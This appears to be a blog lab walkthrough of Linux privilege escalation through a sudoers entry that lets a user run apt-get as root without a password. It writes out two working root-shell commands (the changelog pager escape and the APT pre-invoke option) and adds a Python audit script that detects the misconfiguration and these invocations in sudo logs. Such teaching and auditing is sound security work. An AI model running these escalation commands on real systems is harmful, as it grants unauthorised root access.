apt-get Privilege Escalation Linux

How a sudoers entry for the apt-get command leads to sudo privilege escalation

I add a user named hacker for testing, run the id command to check the hacker user's user ID and group ID, and then test the sudo command for the new user with sudo su. The error is: user hacker is not allowed to execute /bin/bash as root.

sudo su: switches the current user to the superuser (root).

id
sudo su
Our first step is the lab setup for sudo rights privilege escalation. I am using Ubuntu 16.0.

Now open the sudoers file with this command so that we can add our user to it:

sudo visudo

After opening the sudoers file, I add our user hacker with permission to run the apt-get command without a password.

apt-get: a command-line tool for handling packages on Linux; it installs new packages and removes old ones.

hacker ALL=(root) NOPASSWD: /usr/bin/apt-get 

Save the file.

Then run sudo -l to check the sudoers entry:

sudo -l

The sudo -l output shows that /usr/bin/apt-get can be run as root without a password. There are two ways to escalate privileges with the apt-get command.

changelog: downloads and displays the changelog for the given package.

sudo apt-get changelog apt

The changelog opens in a pager that accepts shell commands. Once it is open, start a bash shell by typing the command !/bin/bash and pressing Enter:

!/bin/bash

The normal user hacker's shell is now a superuser (root) shell. Check with the id command:

id

The second way to escalate privileges with the apt-get command:

sudo apt-get update -o APT::update::pre-invoke::=/bin/bash

And again we get a root shell.
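
To check a system for this misconfiguration and for the two invocations shown above, here is an added audit example (not code from the original post). The log lines, the host name and the second sudoers entry are constructed samples, and the function names are hypothetical.

```python
import re

# Constructed sudoers lines; the first is the lab entry from this post.
SAMPLE_SUDOERS = """\
hacker ALL=(root) NOPASSWD: /usr/bin/apt-get
deploy ALL=(root) NOPASSWD: /usr/bin/apt-get update
"""

# Constructed log lines in sudo's syslog format (host name "lab" is made up).
SAMPLE_LOG = """\
Mar  3 10:01:12 lab sudo:   hacker : TTY=pts/0 ; PWD=/home/hacker ; USER=root ; COMMAND=/usr/bin/apt-get changelog apt
Mar  3 10:04:40 lab sudo:   hacker : TTY=pts/0 ; PWD=/home/hacker ; USER=root ; COMMAND=/usr/bin/apt-get update -o APT::update::pre-invoke::=/bin/bash
Mar  3 10:09:02 lab sudo:   admin : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

# apt or apt-get binary, followed by an optional argument string.
APT = r"(\S*/apt(?:-get)?)(?:\s+(.*))?$"
SPEC_RE = re.compile(r"^(\S+)\s+\S+\s*=\s*(?:\([^)]*\)\s*)?(?:\w+:\s*)*" + APT)
LOG_RE = re.compile(r"sudo:\s+(\S+) : .*?COMMAND=" + APT)

def audit_sudoers(text):
    """Return (user, binary) for entries that allow apt/apt-get with any arguments."""
    findings = []
    for line in text.splitlines():
        m = SPEC_RE.match(line.strip())
        # No argument list in the entry means every subcommand and option is allowed.
        if m and not m.group(3):
            findings.append((m.group(1), m.group(2)))
    return findings

def scan_sudo_log(text):
    """Return (user, reason) for the two apt-get invocations shown in this post."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        user, args = m.group(1), m.group(3) or ""
        if re.search(r"(?:^|\s)(?:-o|--option)", args):
            hits.append((user, "APT config override passed with -o"))
        elif re.search(r"(?:^|\s)changelog(?:\s|$)", args):
            hits.append((user, "changelog opened in a pager as root"))
    return hits

if __name__ == "__main__":
    print(audit_sudoers(SAMPLE_SUDOERS))
    print(scan_sudo_log(SAMPLE_LOG))
```

The second sudoers entry is not flagged because sudo requires the user's arguments to match a listed argument string exactly, so it permits only apt-get update with no extra options.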

About Rahul Gehlaut

Cyber Security Researcher, CTF Player. Tech Blog Writer.
